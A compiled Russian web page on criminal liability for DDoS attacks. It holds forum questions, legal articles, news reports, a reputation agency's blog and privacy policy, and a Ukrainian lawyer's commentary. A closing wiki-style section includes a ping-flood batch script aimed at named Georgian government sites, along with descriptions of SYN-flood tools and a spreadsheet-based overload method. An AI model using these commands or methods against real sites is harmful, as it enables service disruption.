Ddos закон

Содержание страницы:

за ДДос атаку не посадят ? есть ли защита в нете ?

» Когда знают Ip адрес тут-же показывается провайдер а далее показывают адрес, время, и много-много информации о тебе и в данном случае сервер отдает дело на рассмотрение в суд если он этого захочет, а захочет этого любой уважающий себя админ! И там будут судить не по Украине, а по правилам и законам той страны в котором находится сервер! Минимум это штраф в той сумме которую скажет Админ, максимум посадют до 5 лет это при условии слива базы данных и личной информации! «

вот было высказано одним человеком такое мнение . и у меня возник целый ряд вопросов , на которые хотелось бы получить ответ .

1)Насколько реально посадить человека за ДДос таку ?
2)Возможно ли как было написано в процитированом мной сообщении узнать о человеке всё по IP ?
3)Я слышал , но не совсем осведомлен в даном вопросе , что информация о пользователях интернета скрывается и защищена закон и получить её не имеет права никто воооооще . Так ли это ?

вроде как не отменяли

Статья 272 УК РФ. Неправомерный доступ к компьютерной информации
Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ) , системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, — наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.

Статья 273. УК РФСоздание, использование и распространение вредоносных программ для ЭВМ
Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами — наказываются лишением свободы на срок до трех лет со штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев.

Авторам DDos-атак нашли уголовную статью

Правозащитники упрекают власти в неспособности защитить «политический» рунет от анонимных хакерских атак

В день думских выборов, 4 ноября, и в предшествующие дни не менее 25 федеральных и региональных интернет-ресурсов, включая не только информационные и правозащитные порталы, но и сайты избирательных комиссий, стали объектами спланированной хакерской атаки. Об этом говорится в докладе межрегиональной правозащитной ассоциации «Агора» «Кибератака как инструмент политической борьбы». По мнению авторов доклада, российское правосудие не гарантирует эффективной защиты от такого рода нападений, хотя в УК имеется соответствующая статья.

По данным «Лаборатории Касперского», предвыборные DDos-атаки — массированные перегрузки сайтов с целью довести их до отказа — начались 2 декабря. Основной мишенью хакеров стал портал «Карта нарушений» — проект ассоциации в защиту прав избирателей «Голос», а также сайт самого «Голоса». «Одновременно с кибератакой 4 ноября оказались заблокированы адреса электронной почты сотрудников «Голоса» и был организован автодозвон на их телефоны», — отмечают авторы доклада «Агоры», правовой аналитик этой некоммерческой организации Дамир Гайнутдинов и руководитель НКО Павел Чиков. В целом, по данным «Агоры», объектами хакерских атак стали интернет-ресурсы, чья общая ежемесячная аудитория превышает 7 млн. посетителей.

Впрочем, пока известно лишь об одном обращении владельца пострадавшего сайта в правоохранительные органы. Как уже сообщали «МН», главный редактор радиостанции «Эхо Москвы» Алексей Венедиктов обратился в Генпрокуратуру в связи с хакерской атакой на сайт «Эха Москвы». Копии своей жалобы Венедиктов направил в Центризбирком и в управление «К» МВД — профильное подразделение министерства, ведающее «борьбой с преступлениями в сфере компьютерной информации».

Хакерские атаки на независимые ресурсы рунета случались и ранее, говорится в докладе «Агоры». В частности, «с 2008-го по осень 2011 года зафиксировано 17 случаев DDoS-атак на общественно-политические порталы, включая сайты «Новой газеты», «Ведомостей», «Коммерсанта», радиостанции «Финнам FM» и блоги «живого журнала». Однако синхронные нападения хакеров накануне, во время и после выборов в Госдуму правозащитники считают беспрецедентными. «Налицо переход давления на независимые СМИ, НКО и отдельных активистов на качественно новый уровень», — полагают в «Агоре». Вместе с тем следует отметить, что в достаточно разнообразном перечне жертв киберпреступников оказался и официальный сайт «Единой России»: специалисты «Лаборатории Касперского» полагают, что одни и те же злоумышленники подвергли DDoS-атаке сайт «ЕР», интернет-представительство «Левада-центра» и один из региональных ресурсов КПРФ.

В целом, по словам IT-специалистов, в самих по себе массированных хакерских атаках нет ничего нового. «Английская аббревиатура DDoS расшифровывается как Distributed Denial of Service — «распределенный отказ в доступе». Суть атаки заключается в том, что сеть компьютеров, (которую еще называют botnet или бот-сеть), перегружает определенный сайт, посылая туда аномально большое количество запросов, — пояснил «МН» администратор портала «Права человека в России», координатор межрегиональной группы «Правозащитная сеть» Сергей Смирнов. — В итоге забивается доступ обычным пользователям, создается искусственная очередь, страница не открывается». Сайт hro.org, который администрирует Смирнов, также стал объектом DDoS-атаки в день выборов.

Обычно бот-сеть состоит из тысяч компьютеров. Например, сайт «Эха Москвы», по словам Алексея Венедиктова, «ддосили» одновременно около 200 тыс. компьютеров, расположенных не только в России, но и, например, в Индии. Владельцы могут и не подозревать о том, что их компьютеры участвуют в таких неблаговидных делах, отмечает Смирнов. Машины, как правило, заражены вирусами-троянами, которые и заставляют компьютер постоянно посылать запросы на атакуемый сайт. «Но для организации атаки нужен человек, который контролирует зараженные компьютеры, включенные в бот-сеть. В принципе, исполнителем может быть один злоумышленник», — объясняет Смирнов.
По его словам, DDoS-атака далеко не всегда используется в политических или хулиганских целях. Услугами хакеров пользуются и коммерсанты для выведения из строя сайта конкурентов. «Существует определенный «рынок услуг», а сами бот-сети являются предметом купли-продажи», — замечает Смирнов. Против такого рода хакерских атак нет проверенного средства, констатирует Смирнов. Вычислить в разумное время заказчика или хотя бы исполнителя не представляется возможным — во всяком случае, некоммерческим организациям это не по силам.

Заметим, что один из крупнейших российских специалистов по антивирусной защите Евгений Касперский, комментируя в своем блоге последствия масштабных DDoS-атак, заметил, что расследование блокировки и отключения сайтов технически возможно. При этом Касперский, едва ли не единственный из экспертов рунета выдвинул не политическую, но техническую версию обрушения сайтов. «Не исключен сценарий, что перегретые политической жизнью граждане с активной позицией «закликали» раскрученные политизированные сайты, — пишет Касперский. — Т.е. эти ресурсы вполне могли стать жертвой своей популярности (кстати, с нами самими пару раз такое тоже случалось)».

Если все же одновременный выход из строя почти трех десятков популярных сайтов — дело рук группы злоумышленников, то пострадавшим не следует надеяться на правоохранителей и правосудие, полагают авторы доклада ассоциации «Агора». «Ни правоохранительные органы, ни Роскомнадзор не сделали ничего, чтобы защитить право граждан на выражение своего мнения в сети», — пишут Гайнутдинов и Чиков. Единственным известным авторам доклада случаем, когда расследование преступления по статье 272 УК (неправомерный доступ к компьютерной информации) было эффективно проведено, было не общественно-политическое, а коммерческое дело — о блокировании сайта «Аэрофлота».

Поскольку, по мнению авторов доклада, пока надежды на эффективное расследование этих преступлений внутри России нет, в будущем году следует ожидать серию жалоб в Страсбургский суд, связанных с DDoS-атаками, «а это означает, что проблема политической кибервойны выйдет на международный уровень». Правозащитники напоминают, что в 2010 году главные редакторы СМИ обращалась к президенту Дмитрию Медведеву с просьбой обеспечить эффективное расследование хакерских атак. Президент поручил главе ФСБ Александру Бортникову разобраться. В 2011-м заявление о возбуждении уголовного дела по факту ddos-атак в правоохранительные органы подавала редакция «Новой газеты», которая получила отказ. В связи с атаками на «живой журнал» весной 2011 года представители управления «К» МВД заявили, что «этот сервис находится в юрисдикции правоохранительных органов США, и вопрос о расследовании будет решаться в рамках международного сотрудничества».

Однако и вопрос с международным сотрудничеством в борьбе с киберпреступностью пока не решен. В 2008-м Владимир Путин, занимавший тогда пост президента, своим приказом отозвал подпись России под Конвенцией Совета Европы о киберпреступности, которую РФ ратифицировала в 2005 году. В конвенции, в числе прочего, прописаны правила взаимодействия правоохранителей, в случае, когда киберпреступник и его жертва находятся в разных странах и подчиняются разным законам. Однако Россию не устроила статья международного соглашения, которая дает одной стране-подписанту возможность трансграничного доступа к компьютерным системам другого государства.

Заметим, что закрываясь от иностранных борцов с хакерами, российские власти вынашивают идею сделать «прозрачными» самих пользователей рунета — по мнению правоохранителей, анонимность в социальных сетях является питательной почвой для экстремизма и киберпреступности. Как заявил на днях начальник Бюро специальных технических мероприятий МВД (в структуру которого входит управление «К») генерал-майор полиции Алексей Мошков, ведомство считает целесообразным «снизить степень анонимности в сети» так, чтобы участники форумов и групп в социальных сетях и чатах не прятались за прозвищами-никами, а выступали бы под реальными именами.

Как сделать Ддос-атаку и сесть на семь лет

Заказать Ддос-атаку много ума не надо. Заплатил хакерам и думай о панике конкурентов. Сначала с кресла директора, а потом с тюремной койки.

Объясняем, почему обращаться к хакерам — последнее дело честного предпринимателя и чем это грозит.

Как сделать Ддос-атаку знает даже школьник

Сегодня инструменты для организации Ддос-атаки доступны для всех желающих. Порог вхождения для начинающих хакеров низкий. Поэтому доля коротких, но сильных атак на российские сайты выросла. Похоже, что хакерские группы просто отрабатывают навыки.

Показательный случай. В 2014 году Образовательный портал Республики Татарстан подвергся Ддос-атакам. На первый взгляд, в нападении нет смысла: это не коммерческая организация и спросить с неё нечего. На портале выставляют оценки, расписание занятий и так далее. Не более. Эксперты «Лаборатория Касперского» нашли группу «Вконтакте», где студенты и школьники Татарстана обсуждали как сделать Ддос-атаку .

Сообщество юных борцов с системой Республики Татарстан

Производные запросы от « как сделать Ддос-атаку Татарстан» привели специалистов по кибербезопасности к интересному объявлению. Исполнителей быстро нашли и им пришлось возместить ущерб.

Раньше вырывали страницы в дневниках, а теперь взламывают сайты

Из-за простоты Ддос-атак за них берутся новички без моральных принципов и пониманий своих возможностей. Такие могут и перепродать данные о заказчике. Омоложение исполнителей Ддос-атак — мировая тенденция.

Весной 2017 года тюремный срок получил британский студент. Когда ему было 16 лет, он создал программу для Ддос-атак Titanium Stresser. На её продаже британец заработал 400 тысяч фунтов стерлингов (29 миллионов рублей). С помощью этой Ддос-программы провели 2 миллиона атак на 650 тысяч пользователей во всём мире.

Подростками оказались участники крупных Ддос-группировок Lizard Squad и PoodleCorp. Юные американцы придумали собственные Ддос-программы , но использовали их для атаки на игровые серверы, чтобы получить преимущества в онлайн-играх. Так их и нашли.

Доверять ли репутацию компании вчерашним школьникам, каждый решит сам.

Наказание за Ддос-программы в России

Как сделать Ддос-атаку интересуются предприниматели, не желающие играть по правилам конкуренции. Такими занимаются сотрудники Управления «К» МВД России. Они же ловят исполнителей.

Российское законодательство предусматривает наказание за кибер-преступления. Исходя из сложившейся практики, участники Ддос-атаки могут попасть под следующие статьи.

Заказчики. Их действия обычно подпадают под статью 272 УК РФ — неправомерный доступ к охраняемой законом компьютерной информации.

Наказание: лишение свободы до семи лет или штраф до 500 тысяч рублей.

Пример. По этой статье осудили сотрудника отдела технической защиты информации администрации города Курган. Он разработал многофункциональную Ддос-программу Мета. С её помощью злоумышленник собрал персональные данные на 1,3 миллиона жителей города. После — продавал банкам и коллекторским агентствам. Хакера получил два года лишения свободы.

Исполнители. Как правило, наказываются по статье 273 УК РФ — создание, использование и распространение вредоносных компьютерных программ.

Наказание. Лишение свободы до семи лет со штрафом до 200 тысяч рублей.

Пример. 19-летний студент из Тольятти получил получил 2,5 года условного срока и штраф 12 млн рублей. С помощью программы для Ддос-атак он пытался обрушить информационные ресурсы и сайты банков. После атаки студент вымогал деньги.

Неосторожные пользователи. Несоблюдение правил безопасности при хранении данных карается по статье 274 УК РФ — нарушение правил эксплуатации средств хранения, обработки или передачи компьютерной информации и информационно-телекоммуникационных сетей.

Наказание: лишение свободы до пяти лет или штрафом до 500 тысяч рублей.

Пример. Если в ходе доступа к информации каким-либо образом были похищены деньги, статью переквалифицируют в мошенничестве в сфере компьютерной информации ( статья 159.6 УК РФ). Так два года в колонии-поселении получили уральские хакеры, получившие доступ к серверам банков.

Нападки на СМИ. Если Ддос-атаки направлены на нарушение журналистских прав, действия подпадают под статью 144 УК РФ — воспрепятствование законной профессиональной деятельности журналиста.

Наказание: лишение свободы до шести лет или штрафом до 800 тысяч рублей.

Пример. Эту статью часто переквалифицируют в более тяжёлые. Как сделать Ддос-атаку знали напавшие на «Новую газету», «Эхо Москвы» и «Большой город». Жертвами хакеров становятся и региональные издания.

В России суровое наказание за использование Ддос-программ . Анонимность от Управления «К» не спасёт.

Программы для Ддос-атак

По информации экспертов, для атаки на средний сайт достаточно 2000 ботов. Стоимость Ддос-атаки начинается от 20 долларов (1 100 рублей). Количество атакующих каналов и время работы обсуждаются индивидуально. Встречаются и вымогательства.

Такое письмо может прийти на почту каждому. Фото roem.ru

Приличный хакер перед атакой проведёт пентест. Военные назвали бы этот метод «разведка боем». Суть пентеста в небольшой контролируемой атаке, чтобы узнать ресурсы защиты сайта.

Интересный факт. Как сделать Ддос-атаку знают многие, но сила хакера определяется ботнетом. Часто злоумышленники крадут у друг друга ключи доступа к «армиям», а потом перепродают. Известный приём — «положить» wi-fi, чтобы тот принудительно перезагрузился и вернулся к базовым настройкам. В таком состоянии пароль стоит стандартный. Далее злоумышленники получают доступ ко всему трафику организации.

Последний хакерский тренд — взлом «умных» устройств для установки на них программ-майнеров криптовалюты. Эти действия могут квалифицироваться по статье об использовании вредоносных программ (ст. 273 УК РФ). Так сотрудники ФСБ задержали системного администратора Центра управления полетами. Он установил на рабочее оборудование майнеры и обогащался. Вычислили злоумышленника по скачкам напряжения.

Хакеры проведут Ддос-атаку на конкурента. Потом могут получить доступ к его вычислительных мощность и замайнить биткоин-другой. Только эти доходы заказчику не достанутся.

Риски заказа Ддос-атаки

Подведём итог, взвесив достоинства и недостатки заказа Ддос-атаки на конкурентов.

Если конкуренты насолили бизнесу, хакеры не помогут. Они сделают только хуже. Агентство «Digital Sharks» удалит нежелательную информацию законными способами.

Запросите бесплатный аудит репутации и узнайте, сколько денег вы теряете на негативе каждый месяц.

Похожие статьи:

Добавить комментарий Отменить ответ

Если вам не понравился результат общения с нашим менеджером — пришлите нам на почту письмо с темой «Скидка» и мы пересмотрим цену в меньшую сторону.

Задайте свой вопрос или напишите, что пожелаете

Политика конфиденциальности

Конфиденциальность всех посетителей сайта www.digitalsharks.ru является частью приоритетного для компании Digital Sharks положения о конфиденциальности. Пожалуйста, прочитайте положение о конфиденциальности, чтобы узнать, как мы используем и защищаем собранную информацию.

ПОЛУЧЕННАЯ ОТ ВАС ИНФОРМАЦИЯ

Во время посещения сайта www.digitalsharks.ru Вас могут попросить оставить информацию о себе, включая имя и контактные данные. Мы также можем собрать информацию об использовании нашего сайта и данные из рассылки и/или полученных от Вас сообщений. Digital Sharks может попросить Вас принять участие в опросе, который проводится в целях исследования рынка, но Вы можете отказаться от участия.

ИСПОЛЬЗОВАНИЕ ИНФОРМАЦИИ

Мы будем использовать и анализировать собранную информацию для развития нашего бизнеса. В редких случаях мы можем связаться с Вами, чтобы узнать Ваше мнение о нашей продукции, услугах и для других маркетинговых целей. Мы можем связаться с Вами как по электронной почте, так и по телефону или через социальные сети.

РАЗГЛАШЕНИЕ/ХРАНЕНИЕ ЛИЧНОЙ ИНФОРМАЦИИ

Полученная информация хранится на защищенном сервере на территории РФ. Мы можем передавать обобщенную информацию об использовании нашего сайта третьим лицам, но данная информация не может содержать идентифицирующие вас данные. Когда Вы даете свое согласие на использование контактной информации, мы тщательно выбираем третьих лиц, включая компании в составе нашей группы, которые могут связаться с Вами для предоставления информации об интересующей Вас продукции и услугах. Мы всегда следим, чтобы третьи лица использовали информацию в соответствии с законодательством. Даже если по закону мы должны передать, продать и распространить любую личную информацию, мы обязуемся не делать этого без Вашего согласия. Наконец, если наш бизнес станет совместным предприятием, будет продан или объединен с другой компанией, Ваша информация будет недоступна для новой компании, бизнес-партнера или владельца.

IP-АДРЕС И COOKIES

Мы можем собирать в маркетинговых целях информацию о Вашем компьютере, включая IP-адрес, операционную систему или тип браузера, для управления и отчета на основе обобщенной информации. Это статистические данные о Ваших действиях в Интернете, и они не являются идентифицирующей Вас информацией.

ХРАНЕНИЕ ДАННЫХ И БЕЗОПАСНОСТЬ

Мы используем правила безопасности, защищающие информацию от несанкционированного доступа, незаконной передачи, случайного искажения или утери. В некоторых разделах нашего сайта есть ссылки на другие ресурсы. Если Вы переходите на другой сайт, то в силу вступает положение о конфиденциальности данного сайта.

ООО «Цифровые акулы»
ОГРН 1161690069650
Юр.Адрес: 420107, РТ, г.Казань, ул. Островского, д.67, оф. 501

Что будет, если ваш IP-адрес «засветится» при DDoS-атаке или взломе?

В последнее время участились DDoS-атаки и взломы различных сайтов СМИ и правительственных веб-ресурсов. Государственные органы, отвечающие за безопасность страны, обязаны расследовать подобные киберпреступления. И в качестве «зацепки» в поисках преступников, или для обвинения в причастности к инциденту, они могут использовать IP-адрес, с которого совершалась атака.

С технической точки зрения

Для интернет-провайдера не составляет труда узнать IP-адрес компьютера, с которого осуществлялись атаки. Но, часто по IР-адресу очень сложно идентифицировать конечного пользователя: например, в домашних сетях под одним IP-адресом могут выходить в Интернет множество пользователей. Но даже в случае, если IP-адрес закреплен за конкретной квартирой, там может быть установлен, например, WiFi-маршрутизатор. К нему «по воздуху» подключаются различные устройства, компьютеры, планшеты, смартфоны, которые могут принадлежать разным людям. А если радиус действия WiFi-сети выходит за пределы квартиры, то ее владелец может и не подозревать, что ей пользуются посторонние люди.

Кроме того, злоумышленники могут инфицировать устройство компьютерным вирусом, чтобы получить к нему удаленный доступ без ведома владельца. Так, согласно статистике антивирусных вендоров, в Украине присутствуют миллионы устройств, заражённые различными вирусами, которые превращены в инструменты для атак.

Есть и еще одна проблема. Как показывает практика, многие провайдеры (причем не только в Украине) не блокируют возможность использования своими клиентами чужих IP-адресов. Поэтому атака якобы с IP-адреса украинского пользователя на самом деле может осуществляться из сети, например, в Германии или Панамы.

DDoS-атака с позиции законодательства

На даже если киберпреступник будет принимать участие в DDoS-атаке с компьютера, расположенного непосредственно в недрах СБУ, ему вряд ли грозит криминальная ответственность. Об этом говорит Дмитрий Гадомский, адвокат, партнер АО «Юскутум»:

«Если бы Украину можно было бы назвать правовым государством без огромного количества уточнений и примечаний, то я сказал бы: уважаемые граждане, DDos в Украине не является уголовным преступлением и наказывать за это не будут, даже если поймают. Но в реалиях нынешней судовой системы могу сказать следующее: я готов взяться за защиту любого, кто будет обвинен в DDoS атаке, поскольку считаю позицию обвинения несостоятельной».

Суть здесь в следующем. Правоохранительные органы при расследовании киберпреступлений могут применить лишь ст. 361 УК Украины — «Несанкционированное вмешательство в работу ЭВМ». Сейчас, при отсутствии в законодательстве Украины любого определения что такое DDos, заход на любой сайт больше одного раза может считаться DDos-атакой. А если заходите на сайт одновременно с другими пользователями, то “участвуете в DDos-атаке”.

Круг подозреваемых сужается

Теперь, давайте разберемся, как правоохранительные органы будут идентифицировать круг подозреваемых. Прежде всего из списка вычеркнут пользователей, которые используют динамический IP-адрес, а также проживающих за пределами Украины. В отношении тех пользователей, которые используют фиксированный IP-адрес, правоохранители обратятся к интернет-провайдеру с требованием выдать информацию о лицах, которым был присвоен конкретный адрес.

Напоминаем, что сведения о клиентах провайдера, в том числе IP-адреса, являются персональной информацией, которая защищена действующим законодательством Украины. Органы охраны правопорядка могут требовать такие данные только на основании решений суда, либо следственного судьи. В том случае, если провайдер выдаст такую информацию, правоохранительный орган получит максимум ФИО лица, заключившего договор с провайдером и его фактический адрес.

Потом самое сложное: необходимо установить, кто именно находился за компьютером в момент совершения преступления. Кстати, обычно на этом и строится защита, если дело доходит до суда. Скорее всего подозреваемым будет именно то лицо, на чье имя заключен договор с провайдером (или директор юридического лица, если договор заключен от его имени).

Далее проверяются варианты, описанные выше в технической части. И для тех же пользователей, которые после всех перечисленных итераций останутся подозреваемыми, нужно помнить, что в Украине отсутствует определение DDos, следовательно, за «частые заходы на сайт» нельзя привлечь к уголовной ответственности. А в случае обвинения в причастности ко взлому лучше всего сразу обращаться к адвокату.

Взлом сайта приравнивается к взлому сейфа

Что касается взломов сайтов и почтовых ящиков, то здесь с правовым обоснованием ситуация проще — Уголовный кодекс прямо устанавливает за такие действия уголовную ответственность, указывает Дмитрий Гадомский: «Дьявол прячется в деталях. Сложно представить человека, имеющего знания, которых хватает, чтобы найти уязвимость в сервисе Gmail или Hotmail, и не способного сменить свой IP-адрес. Подавляющее большинство подобных преступлений совершаются грамотными в техническом и юридическом плане специалистами. Поэтому выявленный IP-адрес, скорее всего, будет либо частью бот-сети, либо находиться за пределами Украины».

Хотя в Украине существует практика привлечения к уголовной ответственности за «хакинг», вероятность поимки человека, взломавшего ваш аккаунт в facebook стремиться к нулю. Поэтому еще раз напоминаем о том, что спасение утопающих — дело рук самих утопающих. Будьте внимательны, где и какие данные оставляете в сети, на какой сайт захоите и куда вводите пароль. И не забывайте про регулярное обновление антивирусной базы.

Ddos закон

АИБ сидели на трубе. Нульч упал, Сосач пропал. У кого посольство в /b/?

DDoS (сокр. от англ. Distributed Denial of Service , Распределённый отказ от обслуживания) — изначально тип сетевой атаки, основанной на небезграничности ресурсов атакуемой службы, к которой организуется масса запросов, с которыми она заведомо не сможет справиться, и будет вынуждена отказать в обслуживании (либо заставить ждать неприемлемо долго), собственно, отсюда и название. Иногда слово применяется к аналогичным ситуациям в оффлайне (примеры ниже).

Содержание

[править] Что такое DDoS атаки и где их заказать?

DoS-атака (Denial of Service) — закидывание неугодных ресурсов различным флудом, приводящее их к нокдауну. А DDoS-атака — это такая DoS-атака, которую осуществляет не один энтузиаст, а разгневанная толпа, желающая Страшный Суд, Ад и Погибель неправославному ресурсу. Весь профит этого метода заключается в том, что грамотно спланированную атаку невозможно отразить вообще. А ещё DDoS делается не только со своего компьютера, и среди программ до сих пор используется старый добрый Zeus. В результате сервер начинает как минимум безбожно тормозить при ответах на нормальные запросы, а то и вовсе ложится, не вынеся такого издевательства.

[править] Проще говоря

Проще говоря, что такое DoS? Это, к примеру, когда ведёшь разговор с кем-то, но тут подходит алкаш, и начинает громко нести бред. Говорить либо невозможно, либо очень сложно. Решение: зовёшь охрану, она скручивает синяка и уводит.

DDoS же отличается тем, что алкашей вбегает толпа многотысячная, и даже если позвать охрану, она банально не сумеет всех скрутить и увести.

Наиболее же эффективная атака такого плана выполняется не тысячами набежавших алкашей (ибо набор добровольцев, организация, синхронизация и прочее), а превращением в зомби уже имеющихся вокруг мирных юзеров. Они уже есть, уже ходят вокруг, уже оборудованы ртом — осталось только заставить их начать орать поциенту в ухо. Всем сразу и независимо от их желания, по команде, с исполнительностью и настойчивостью компьютера. В компьютерном мире такой зохват душ обычно выполняется с помощью трояна.

[править] IRL

Пример с алкашами вполне может быть применён к реалу. DDoS атаки проводились ещё в докомпьютерную эру различными весёлыми способами. Например:

Школьный Это когда ученики, чтобы достать неугодного учителя, начинали мычать под нос. К кому учитель подходит, тот замолкает, остальные продолжают. Урок вести невозможно, ибо мычание быстро перерастает в рёв. Выяснить, кто мычит — тоже (описан у Льва Кассиля в «Кондуит и Швамбрания», а также в книге «Республика ШКИД»). Бюрократический Описан у Стругацких в «Сказке о тройке». Комиссию по рационализации и утилизации завалили кучей глупых заявок, и её работа была парализована. Телефонный Это когда одному заслужившему хую регулярно звонят десяток-другой сочувствующих. На отлично ездит по нервам, а при должном усердии или количестве звонящих аппаратом становится невозможно пользоваться. Автоматизирован колл-центрами для борьбы с нелегальной рекламой по заказу властей. Пример: бесконечные заёбывающие звонки профессору Жуку из довольно-таки винрарной пьесы Кира Булычёва. Потребительский Был проведён в Новосибе в одном из супермаркетов, где ввели новые правила, запрещающие кассирам обслуживать покупателей, не взявших корзинку или тележку. Народ устроил флэшмоб: в магазин пришла пара сотен человек, все взяли тележки, каждый кинул в свою тележку один сырок, и, как полагается, встали в очереди к кассам. Работа магазина остановилась. Охрана суетилась и бегала, но никто ничего не мог сделать: всё по закону и правилам, люди пришли за сырками… Еще, в романе Артура Хейли «Менялы» описана типичная DDoS-атака на банк : масса людей по призыву некоей общественной организации (защиты прав потребителей) открывают счета на суммы типа пять баксов, затем кладут на них небольшие деньги, тут же их снимают, кладут опять и т. д. по кругу, изводя при этом кассиров долгими неторопливыми расспросами. Банк парализован. На башорге «ДДоС атака на троллейбус — толпа народу с 500-рублёвыми купюрами» И про башорг «ДДоС атака на башорг — толпа народу с чувством юмора»

[править] DDoS группировки в России

В России есть две крупные организации, занимающиеся DDoS-атаками на различные сайты:

  • ООФР (Организация Объединенных Фагов России), в которую входят следующие мем-группировки: Лепрозорий Суеверный, Падшая часть ЖЖ и во главе, конечно же, Упячка.
    Главными жертвами ООФР стали:
  1. www.mail.ru (за проект ЖУКИ),
  2. www.gay.com (за то что гей),
  3. www.4chan.org (за оскорбления бога «Онотоле»),
  4. www.wikipedia.org (за статью про УПЧК, в которой было оскорбление в сторону котов (Котэ), не снятое модератором в течение месяца)
    И многие другие мелкие сайты, такие, например, как Двач и Зоофил.ру (посещаемостью в 100—200 человек).
    ООФР распалась в 2009 году из-за падения Упячки. После «возрождения» УПЧК плавно перелилась в безымянную группировку во главе с домовзрывателями.
  • Хакер.Ру — крупнейший сайт скрипткидисов в СНГ, известен атакой на Ubisoft, в которой принимали участие приблизительно 4000-10000 человек (по словам админа) из России, Украины, Беларуси и даже некоторых европейских стран с целью наказать Ubisoft за разработанную ими DRM, новую защиту игр, над которой два месяца ломали бошку все кракеры мира. В результате атаки все сервера Ubisoft были перекрыты, сайт раскрашен (crash) на 4 часа. Также пользователям Хакера.Ру помогали фаги из новой Упячки и различные геймеры с разбитым сердцем. В активной ветке сабжа наблюдалось около 1000—1500 тужащихся, как несложно догадаться, испорожнения были эпическими. После вышеописанных событий и бурления говн у Ubisoft отпало желание использовать DRM в своих последующих проектах пруфлинк

[править] ping как средство DDoS

Создаём бат файл и запускаем в 12:00, 15:00, 18:00, 20:00 по Москве @echo off @echo Call this file (MSK) 12:00, 15:00, 18:00, 20:00 @echo Thanks for support of South Ossetia! Please, transfer this file to the friends! pause start ping -n 5000 -l 1000 www.newsgeorgia.ru -t start ping -n 5000 -l 1000 www.apsny.ge -t start ping -n 5000 -l 1000 www.nukri.org -t start ping -n 5000 -l 1000 www.opentext.org.ge -t start ping -n 5000 -l 1000 www.messenger.com.ge -t start ping -n 5000 -l 1000 www.president.gov.ge -t start ping -n 5000 -l 1000 www.government.gov.ge -t start ping -n 5000 -l 1000 www.parliament.ge -t start ping -n 5000 -l 1000 nsc.gov.ge -t start ping -n 5000 -l 1000 www.constcourt.gov.ge -t start ping -n 5000 -l 1000 www.supremecourt.ge -t start ping -n 5000 -l 1000 www.cec.gov.ge -t start ping -n 5000 -l 1000 www.nbg.gov.ge -t start ping -n 5000 -l 1000 www.nplg.gov.ge -t start ping -n 5000 -l 1000 www.police.ge -t start ping -n 5000 -l 1000 www.mod.gov.ge -t start ping -n 5000 -l 1000 www.mes.gov.ge -t start ping -n 5000 -l 1000 www.mfa.gov.ge -t start ping -n 5000 -l 1000 www.iberiapac.ge -t start ping -n 5000 -l 1000 www.mof.ge -t start ping -n 5000 -l 1000 www.sololaki.ru -t start ping -n 5000 -l 1000 www.president.pl -t

Эффективность этого способа невысокая, поскольку для защиты достаточно заблокировать ICMP echo-request пакеты, направленные на атакуемый сайт. Такая простая фильтрация позволяет надежно отделить валидные пакеты от мусорных, и на это способны даже простейшие маршрутизаторы. Если такую фильтрацию включить ещё на дальних подступах, где трафик с атакующих машин не забивает весь канал, то такой DDoS никак не повлияет на работоспособность атакуемого ресурса. Тем не менее, при массовом использовании может создавать некоторые проблемы.

Появлявшиеся то и дело новости об атаках на грузинские сайты (например) некоторые посетители баша восприняли как исключительно свою победу, хотя очевидно, что хакеры тоже не спали и проводили DDoS более надёжными способами.

Впрочем, грузинские админы никаких выводов не сделали. Так, president.gov.ge реально положить с двух-трёх компов нехитрой комбинацией ping+Sprut.

[править] LOIC

LOIC (Low Orbit Ion Cannon) — семейство софтин для DoSинга сайтов. Активно используются битардами во время разнообразных рейдов и междоусобных войн.

[править] Sprut

Старая проверенная программка, написанная мэтром yarik.by винрар знает в каком году.

Основана на SYN-флуде, то есть на открытии кучи соединений. Фишка в том, что сервак обычно не резиновый и соединений может держать конечное число; в Apache по умолчанию — 255. А Sprut их все занимает, и сайт превращается в слепоглухонемого.

Легко отбивается пряморуким админом путём ограничения максимального количества соединений с одним IP. (Никаких проксей осьминожек не признает и потому легко палится). Несмотря на это, всего с одного компа, с одним IP, вполне можно удерживать лежачими сайты без опытных работников.

Sprut входит в число излюбленных «лучемётов» УП4К вместе с LOIC и ударным пингом. А вообще, любая координированная SYN-флуд атака, при использовании пусть и небольшого диапазона IP, успешно валит каждый второй сервер, а при крупном диапазоне IP ложится до 95% серверов на просторах TCP.

[править] DC++ DDoS

Ещё в 2008 году в DC++ была найдена уязвимость, позволяющая произвести DDoS с помощью всех компьютеров, подключенных к какому-либо хабу. Отличительная особенность этого варианта DDoS’a — его успех зависит от количества юзеров на хабе, а не от числа людей, которые производят сам DDoS (то есть этот способ эффективен, даже если работать в одиночку).

По состоянию на 26.04.2012 ботнет получается собрать не более чем из 1000 юзеров. DDoS только в теории…

[править] Корпорация добра как средство DDoS

Суть такова:
1. Создаем документ в этом их Spreadsheet
2. Вставляем в ячейки таблицы тысячи формул вида:

3. Гугль начнет кэшировать файлы по ссылкам из формул, чем создаст на атакуемый сайт нехилую нагрузку .
4. .
5. PROFIT
Сайт практически гарантированно упадет либо от засирания канала, либо от превышения дневной нормы трафика. А главное, анон — качаешь эти данные не ты, и тебе совершенно не обязательно иметь дома персональный 100-мегабитный интернет-канал. Еще есть его мать другие методы защиты от Ddos и варианты накатать жалобу, если вас все достало сделайте это.

[править] Термоядерный DDoS

То же самое, что и обычный, только выполняется ботнетом в сотни тысяч машин. Такой ботнет легко забивает магистральный канал в 100 Гбит/сек. Впервые такой DDoS был устроен в рунете в октябре 2010, в результате чего у УкрТелекома были серьезные проблемы с магистральными каналами (атаковали одного из их клиентов). Жертва, исправляя свои DNS-записи, смогла лишь временно положить ya.ru и насолить darpa.net, что было даже воспето в стихах. Способов защиты от столь масштабного DDoS не изобрел ещё никто.

